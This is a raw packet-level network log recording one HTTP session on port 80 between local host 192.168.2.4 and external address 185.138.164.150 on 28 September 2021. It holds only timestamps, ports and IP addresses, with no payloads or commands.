Sep 28, 2021 07:14:08.239073992 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.239105940 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.239134073 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.239136934 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.239187002 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.239748001 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.239772081 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.239797115 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.239856005 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.239952087 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.240030050 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.268579960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.268609047 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.268631935 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.268655062 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.268663883 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.268668890 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.268685102 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.268713951 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.268757105 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.274614096 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.274636030 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.274668932 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.274687052 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.274703026 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.274704933 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.274722099 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.274729967 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.274796009 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.275566101 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.275584936 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.275599957 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.275641918 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.276371002 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.276391983 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.276439905 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.276449919 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.276504040 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.276741028 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.276794910 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.276817083 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.276843071 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.277709961 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.277731895 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.277744055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.277802944 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.277820110 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.277837992 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.277889013 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.277908087 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.277987003 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.278023005 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.278040886 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.278054953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.278072119 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.278086901 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.278101921 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.278101921 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.278131008 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.278590918 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.278664112 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.278711081 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.278727055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.278795958 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.279691935 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.279733896 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.279772043 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.279828072 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.279835939 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.279885054 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.279891968 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.279949903 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.279994965 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.280488968 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.280507088 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.280549049 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.280575991 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.280653000 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.280668974 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.280693054 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.280698061 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.280741930 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.280962944 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.281043053 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.281059980 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.281095982 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.281124115 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.281141043 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.281162024 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.281179905 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.281215906 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.281780958 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.281804085 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.281820059 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.281835079 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.281852007 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.281902075 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.282633066 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.282658100 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.282675028 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.282696009 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.282711983 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.282720089 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.282731056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.282758951 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.282783985 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.282840014 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.282856941 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.282876015 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.282917023 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.283432961 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.283457041 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.283473015 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.283487082 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.283518076 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.284327984 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.284348011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.284373999 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.284403086 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.290431976 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.290451050 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.290465117 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.290482998 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.290483952 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.290498972 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.290513039 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.290518999 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.290556908 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.304833889 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.304866076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.304889917 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.304900885 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.304907084 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.304948092 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.304949045 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.304965973 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.304985046 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.304994106 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.305001974 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.305016994 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.305032015 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.305037022 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.305047035 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.305062056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.305079937 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.305104971 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.310827971 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.310864925 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.310883045 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.310884953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.310900927 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.310937881 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.315561056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.315582037 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.315598011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.315629959 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.315645933 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.315660954 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.315663099 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.315680981 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.315709114 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.315726995 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.315752983 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.315798998 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.315855980 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316404104 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316421032 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316436052 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316452980 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316468000 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316483021 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316498041 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.316498995 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316519976 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316536903 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316551924 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316567898 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316613913 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.316633940 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.316858053 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316875935 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.316920042 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.316947937 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.317109108 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.317136049 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.317152977 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.317159891 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.317192078 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.317791939 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.317894936 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.317914963 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.317948103 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.318058014 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.318106890 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.318114042 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.318136930 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.318164110 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.318181038 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.318185091 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.318196058 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.318232059 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.318835020 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.318876982 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.318909883 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.318924904 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.318958998 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.319487095 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.319508076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.319528103 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.319549084 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.319953918 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.320007086 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.320064068 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.320091963 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.320111990 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.320128918 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.320133924 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.320141077 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.320175886 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.320925951 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.320943117 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.320957899 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.320969105 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.320974112 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.321007967 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.321075916 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.321114063 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.321120977 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.321146011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.321197987 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.321919918 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.321938038 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.321954012 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.321979046 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.322180986 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.322201967 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.322228909 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.322246075 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.322280884 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.322438002 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.322457075 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.322480917 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.322500944 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.323389053 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.323405981 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.323421955 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.323432922 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.323487997 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.324608088 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.324628115 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.324676991 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.326442957 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.326461077 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.326477051 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.326509953 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.326529026 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.326548100 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.326562881 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.326565981 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.326579094 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.326596975 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.332250118 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.332307100 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.342070103 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.342102051 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.342118979 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.342140913 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.342164040 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.342195988 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.342251062 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.342456102 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.342513084 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.342554092 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.342578888 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.342600107 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.342622995 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.342624903 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.342645884 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.342665911 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.346194029 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.346225023 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.346245050 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.346265078 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.346282005 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.346297979 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.346318007 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.346363068 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.351840973 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.351867914 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.351880074 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.351892948 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.351908922 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.351924896 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.351938963 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.351960897 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.351990938 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.352092981 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.352323055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.352349997 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.352363110 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.352382898 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.352432966 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.355184078 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355216026 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355236053 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355273008 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355293989 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355321884 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355330944 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.355344057 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355364084 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355375051 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.355384111 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355406046 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.355895042 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355917931 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355942011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355946064 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.355963945 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355983973 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.355988026 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.356004953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.356021881 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.356693029 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.356765032 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.356775045 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.356789112 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.356811047 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.356829882 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.356832981 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.356856108 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.356868029 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.357929945 CEST	80	49751	185.138.164.150	192.168.2.4
